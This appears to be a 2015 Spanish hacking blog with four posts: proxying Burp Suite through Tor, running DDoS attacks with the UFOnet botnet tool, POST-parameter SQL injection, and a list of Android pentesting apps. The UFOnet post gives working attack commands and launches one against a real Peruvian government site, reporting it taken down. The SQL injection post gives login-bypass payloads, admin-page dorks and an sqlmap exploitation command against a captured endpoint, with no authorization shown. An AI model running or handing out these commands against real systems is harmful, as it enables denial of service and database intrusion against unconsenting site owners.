miércoles, 25 de noviembre de 2015

Testing Burpsuite + Tor Browser

Buenos días mis fieles lectores en esta oportunidad estuve leyendo algunos mensajes en la fan page y muchas personas me preguntaban ¿Se puede ejecutar el Proxy de Tor Browser con Burpsuite?.
Pues es verdad, si se puede establecer la conexión mediante el punto de salida al Burpsuite configurándolo.

Pueden instalar el Tor en su sistema windows sin ningún problema:

https://www.torproject.org/download/download-easy.html.en

Si desean instalarlo en Gnu/Linux y les sale un error pueden visitar el siguiente POST para fixiarlo y ejecutarlo con éxito.

http://backtrack-omar.blogspot.pe/2015/09/instalar-tor-browser-en-kali-linux-20-y.html 


Una ves instalado el Tor correctamente procederemos a abrirlo, en esta oportunidad haré este articulo en el sistema operativo Windows, pero de igual manera funciona en cualquier otro S.O.

Configuración

Lo primero que debemos saber es que en que puerto el servidor Tor esta recibiendo la conexión, para ello debemos entrar a Opciones > Avanzado > Red > Configuración.


Podemos ver que el tipo de proxy de nuestra conexión esta en SOCKS5  y corre con el puerto 9150;
ya que la IP 127.0.0.1 (loopback) se establece como local, entonces sabiendo el manejo de red que tiene, nos vamos al Burpsuite.

Cuando estemos en la plataforma nos dirigiremos a la sesión "Options" > Connections
en la parte donde dice "SOCKS Proxy" vamos a añadir la IP y el puerto de Tor.

Cuando hallan añadido las siguientes credenciales como verán en la siguiente imagen, le darán en el casillero "Use Socks proxy".

Una vez hecho  toda la configuración nos saldrá un mensaje en el botón "Alert" donde nos avisará que la conexión se ha establecido correctamente.

Ahora nos vamos a dirigir a nuestro navegador preferido y configuraremos la red de igual manera, pero le añadiremos el puerto 8080 para captar el protocolo de red normal HTTP, en este caso lo haré con el navegador Owasp.




Como vemos, he añadido el proxy de la IP del servidor TOR, pero el puerto de escucha le añadí el 8080 para que se conecte al protocolo HTTP y poder recibir respuestas sin colarse a los nodos, entonces una ves configurado lo siguiente entraremos a un servicio web para testearlo.



Espero les haya gustado este POST, Saludos !!!

martes, 24 de noviembre de 2015

Enviando ataques masivos de DDoS con UFOnet



Saludos mis fieles lectores en esta oportunidad les traigo la herramienta llamada "UFOnet" la cual funciona como una "Botnet" de distribución de denegación de servicio, en nuestro sistema operativo GNU/Linux recolectando fallos de servidores web con la vulnerabilidad "Open Redirect" la cual enviara varias peticiones con grandes paquetes a la pagina objetivo.

http://cwe.mitre.org/data/definitions/601.html 


Descarga

[email protected]:~# git clone https://github.com/epsylon/ufonet
[email protected]:~# cd ufonet
[email protected]:~/ufonet# ls
[email protected]:~/ufonet# cd ufonet
[email protected]:~# ./ufonet

una ves descargado y comprobado que todo salio exitoso, vamos a configurar nuestro servidor añadiendo algunas configuraciones pero antes vamos a explicar algunos métodos que consta dicha herramienta.

Busqueda de Boots

como sabrán esta herramienta consta de una búsqueda de indexiaciones por medio de "Dorks" donde vamos a encontrar parámetros GET  que son vulnerables para realizar este tipo de ataques como son:

  1. 'check.cgi?url='
  2. 'proxy.php?url='
  3. 'validator?uri='
  4. 'checklink?uri='
Al realizar dichas consultas vamos a encontrarnos que el buscador por defauld es "duck", pero también podemos añadir otros parámetros para añadir otros buscadores como lo son bing, google, yahoo, yandex, etc, como son las siguientes:

[email protected]:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'bing'
[email protected]:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'google'
[email protected]:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'yahoo'
[email protected]:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'yandex'

pero si deseamos hacer una búsqueda avanzada de las DORKS en general que contiene el repertorio de ufonet podemos hacer una búsqueda estándar para añadir mas paginas vulnerables las cuales son las siguientes:

[email protected]:~/ufonet/ufonet# ./ufonet --sd 'dorks.txt'

como pueden observar esta elaborando una búsqueda general de todas las Dorks encontradas en dicho documento de texto, donde rápidamente se guardara en un archivo llamado "Zombies.txt.

Pero si deseamos tener una conexión anónima en este caso con un proxy que se directamente con ufonet esta implementado Tor, la cual podemos ejecutarlo de la siguiente manera.

./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:9150"

Si no lo tienen instalado pueden ver el siguiente tutorial donde enseño como configurar lo para Kali.

http://backtrack-omar.blogspot.pe/2015/09/instalar-tor-browser-en-kali-linux-20-y.html

Bueno primero que nada, vamos a  ejecutar algunas conexiones defauld de pruebas de ataques para cargar el servidor y ver algunas peticiones que constan varias variaciones de estructuras, lo que haremos sera ejecutar un comando para obtener una búsqueda relacionada a una DORK como es la siguiente:

 [email protected]:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url='

luego de ello vamos a ejecutar el siguiente comando para cargar los módulos de los servicios web vulnerables

 [email protected]:~/ufonet/ufonet# ./ufonet -i http://target.com

como vemos los archivos están siendo cargados de manera exitosa en nuestro servidor local, pero también podemos ejecutar  el siguiente comando para elaborar un TEST en el siguiente servicio.

 [email protected]:~/ufonet/ufonet#  ./ufonet -a http://target.com -b "/biggest_file_on_target.xxx" 


sin duda este ataque es muy efectivo ya que va realizar consultas con las listas mas grandes que puede ver en el servidor y es uno de los mas efectos, pero también podemos ejecutar el siguiente que es aun mas prodigioso si es que se ha configurado bien el buscador de web's vulnerables, si deseamos lanzar un ataque mediante las conexiones de envíos por defauld podemos añadir lo siguiente:

[email protected]:~/ufonet/ufonet# ./ufonet -a http://www.peru.gob.pe -r 10 -v

 como vemos primero nos carga los paquetes de envios de las cabeceras, como acabamos de ver, pero al terminar lo siguiente, empezaremos a enviar las peticiones de acuerdo al tipo de threads que hemos realizado, como en mi caso fue 10, se ara una petición de 10 repeticiones:

como vemos en la siguiente imagen la herramienta consta de una website muy conocida llamada "downforeveryoneorjustme", donde nos dirá, si la web esta Down o UP como vemos nos dice que esta down o caída.


 pero como siempre es bueno hecha ojo en los servicios paso a verificarlo:


Lo interesante es los paquetes que enviá y la respuesta que recibe.

entonces el Test del servidor se ha realizado correctamente. espero les aya gustado este POST.
Saludos!


lunes, 23 de noviembre de 2015

Inyeccion SQL Metodo POST explicación de tema avanzado



Saludos nuevamente mis queridos fieles lectores luego de mucho tiempo de estar inactivo en este mi humilde blog llego a ustedes, en esta oportunidad aprenderemos a como hacer una inyección sql en método POST, antes de comenzar con ello narrare un poco sobre lo que sucede con las inyecciones SQL al insertar sentencias validas enviando datos a la misma DB y obteniendo el famoso bypass , luego haremos la famosa inyección en Método POST :

Una forma de encontrar paginas vulnerables de una manera fácil y floja es utilizando las famosas dork de google, o si deseamos obtener precisamente de una web en especial ya vamos a la auditoria en su escaneo en la plataforma en general :

Ejemplos de Dorks :

  •  inurl:adminlogin.aspx
  •  inurl:admin/index.php
  • inurl:administrator.php
  • inurl:administrator.asp
  • inurl:login.asp
  •  inurl:login.aspx
  •  inurl:login.php
  •  inurl:admin/index.php
  • inurl:adminlogin.aspx
Algunas sentencias de ataque de vectores de mysql :

User: 1'or'1'='1
Password: 
' or 1=1--

Dichos vectores son mas que sentencias de autologeo que nos van a permitir tener un inicio de sección en este caso del primer "Usuario Registrado" como seria en cualquier plataforma como el administrador.. pero tambien podemos utilizar dichos vectores como un indicador de hay una vulnerabilidad en una plataforma web y poder hacer  la explotación

Vayamos por el Bypass algo conocido y utilizado por ejemplo entraremos a esta web , como vemos nos parece el incio de usuario verdad ?? Ok vamos a llenar dichos registros con una sentencia poco conocida por muchos la cual es la siguiente :

1' or (sleep(2)+1) limit 1 --

Como vemos este Bypass tiene un sentencia estructurada muy completa ya que nos dara una validación de "2" tipos de privilegios estándares .

Web de prueba

http://www.prueba.com/foro/index.ngmf

Ahora añadiremos dicho vector 2

1' or (sleep(2)+1) limit 1 --

como vemos acabamos de entrar a un panel administrativo y podemos  hacer lo que deseamos por medio de dicho vector de logeo, pero que pasaría si al ejecutar dicho ataque  nos arroja un error de sentencia estructurado de MySQLi , pues vayamos al ataque :

Web de prueba

http://www.prueba.com/consulta.html

pondremos el siguiente vector para probar la web :

' or 1=1--

como vemos al realizar dicha consulta que enviamos mediante la sentencia or'1'='1 " automaticamente tenemos como respuesta errorea de dicho servidor como vemos en la imagen , ahora podemos saber que la web es vulnerable y pasaremos a explotarla, pero como  vamos a saber que parametro es vulnerable ?
ya que es un parametro "POST" , debemos identificar las cabeceras de envíos que son enviados por respuesta a la web, pero como podemos capturarlos ? , para ello tenemos un complemento en Firefox llamado :


Live HTTP Headers 







Link de descarga : 
https://addons.mozilla.org/es/firefox/addon/live-http-headers/


Automáticamente nos saldrá el icono en nuestros complementos y procedemos abrir dicha aplicación :

como vemos nos sale vacio ya que todavia no se ah enviado respuestas a la web, lo que haremos sera nuevamente enviar la sentencia ' or 1=1--  en dicho encuesta de la web .

Como vemos hemos capturado muchas cabeceras el dicho proceso, pero los que nos interesa es buscar la
 cabecera la cual nos de como referencia el parámetro "POST" con la URL donde hemos iniciado y  posteriormente a la que nos ah arrojado el error de SQLi



Datos Capturados de nuestro Interés :

2- Parametro POST 

http://www.prueba.com/ogmre/ejecuta_notas_ol_cur.php

2- Cabeceras capturadas 


dcodcur=%27+OR+1%3D1--&dcodtur=%27+OR+1%3D1--&dcodsec=%27+OR+1%3D1--

Como vemos las cabeceras están formuladas por " %27+OR+1%3D1-- " que por defecto al hacer una sentencia o unas palabras van a surgir dichos caracteres opcional-mente , lo que haremos sera formar bien las cabeceras para poder tener una Inyección SQLi positivo :

como vemos el primer formulario es el siguiente :


dcodcur=%27+OR+1%3D1--&


dcodcur                      = es el  parámetro POST vulnerable :

%27+OR+1%3D1    = es la sentencia formulada con terminación numeral "1"

--                               = es el espacio otorgado para distanciar la sentencia

&                              = es el vector que separa a los parámetros :

entonces una ves comprendido vamos a añadir la formulación correcta del primer parámetro  :

dcodcur=1 

formulación correcta de todo los parámetros : 

dcodcur=1 dcodtur=1 dcodsec=1


Una ves obtenido todo lo siguiente solo faltaría hacer el penteting con Sqlmap para comprobar dicha  explotación haré la prueba en windows :


sqlmap.py -u "http://www.prueba.com/ogmre/ejecuta_notas_ol_cur.php" --data="dcodcur=1 dcodtur=1 dcodsec=1" --level=5 --risk=5 --dbs


Como vemos es vulnerable a una inyección Sqli, no mostrare la base de datos  por seguridad mia,Saludos y éxitos para todos 

domingo, 22 de noviembre de 2015

Convierte tu Android en un arsenal de Offensive Security

Saludos mis fieles lectores en esta oportunidad no les traigo un tutorial, pero si una lista de aplicaciones Android para el manejo de Pentesting y anonimato que les servirá mucho para sus auditorias en sus celulares inteligentes la cuales no consumen muchos recursos y son fácil de manejar, espero les sirva demasiado porque todos ellos fueron probados por mi persona

Pero antes de todo necesitan Rootear su dispositivo movil, ya que algunas herramientas necesitan privilegios ROOT, pero como siempre me gusta dejar todo completo en un POST les recomiendo esta aplicación que para mi es la mejor.

https://play.google.com/store/apps/details?id=eu.chainfire.supersu 

Para comprobar si tu dispositivo esta rooteado.

https://play.google.com/store/apps/details?id=com.joeykrim.rootcheck

Anonimato:

como bien sabemos el tema del anonimato en la red es vital para ocultarnos de algunos riesgos que se puede tener al entrar a un sitio web desconocido es mas, aun en paginas conocidas  existen scripts malintencionados que pueden afectar al usuario como lo conocemos.

La primera categoría sera sobre el Anonimato de red o mas conocido el cambio de IP a otro ISP de un país.

TunnelBear VPN

https://play.google.com/store/apps/details?id=com.tunnelbear.android&hl=es 

Hotspot Shield

https://play.google.com/store/apps/details?id=hotspotshield.android.vpn&hl=es

CyberGhost

https://play.google.com/store/apps/details?id=de.mobileconcepts.cyberghost&hl=es

Orweb

https://play.google.com/store/apps/details?id=info.guardianproject.browser

OpenVPN



https://play.google.com/store/apps/details?id=net.openvpn.openvpn

En este otro hay personas que mas que proteger su IP desean proteger sus llamadas y mensajes en un algoritmo cifrado que les brinde una comunicación encriptada sin un punto de salida, para ello les dejare lo siguiente:

RedPhone


https://play.google.com/store/apps/details?id=org.thoughtcrime.redphone

Signal Private Messenger



https://play.google.com/store/apps/details?id=org.thoughtcrime.securesms


WickrTop Secret Messenger




https://play.google.com/store/apps/details?id=com.mywickr.wickr2&hl=es


Alguna ves ha recibido mensajes de numeros extraños? que no tienen ni sentido al momento de ver los numeros 0000-0000-0008 o entre otros?, pues les presento el AIMSICD la cual hace una captura en vivo de geolocalizacion entre nuestro "espía" asiendo un escaneo de rangos de antenas de telecomunicaciones.

AIMSICD



https://secupwn.github.io/Android-IMSI-Catcher-Detector/ 

Herramientas de Auditorias:

Quien no les gustaría auditar desde su celular cuando no esta en su casa o esta en un cybercafee conectado a una WIFI o  a sus paquetes de datos para ahorrar y aprovechar el tiempo.

Nipper



https://play.google.com/store/apps/details?id=com.websecuritydev.nipper

WPScan




https://github.com/clshack/WPScan


Herramientas de Pentest website

al final de las auditorias siempre viene el lado divertido que es la penetración al sistema vulnerable, donde confirmaremos si es  penetrable o no.


Sqlmapchik



https://play.google.com/store/apps/details?id=com.muodov.sqlmapchik


Terminal IDE



Herramientas de recolección de datosWIFI

Aveces cuando estamos paseando con nuestro carro o simplemente en un paseo rutinal a pie podemos notar que las señales Wifi en una cuidad nos rodean, las cuales podemos auditar su intensidad, el tipo de encriptacion y sobre todo los puntos de acceso que podamos obtener de manera automática, ya que se grabaran en nuestro celular siempre. 

Wifi Analyzer



Wigle Wifi Wardriving







Auditorias de redes

nMapper



Fing - Network Tools



https://play.google.com/store/apps/details?id=com.overlook.android.fing

Intercepter-NG



https://play.google.com/store/apps/details?id=su.sniff.cepter

Zanti - Movile Penetracion testing


https://www.zimperium.com/zanti-mobile-penetration-testing


Deseas tener Backtrack - Kali Linux u otro sistema operativo GNU Movil en tu sistema android? los invito a utilizar una de las grandes herramientas que existen.

Link de Kali Linux Android:

http://cdimage.kali.org/kali-2.0/kali-linux-light-2.0-armhf.img.xz

Linux Deploy




https://play.google.com/store/apps/details?id=ru.meefik.linuxdeploy

Complete Linux Installer



https://play.google.com/store/apps/details?id=com.zpwebsites.linuxonandroid



Espero les aya gustado este articulo, sin mas que decir me despido de todos ustedes con un fuerte abrazo  a todos mis lectores

Datos del Autor

Estudiante de Ingeniería de computación y sistemas en Perú.
actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.

"Me considero un novato en busca de conocimiento"


Entradas Populares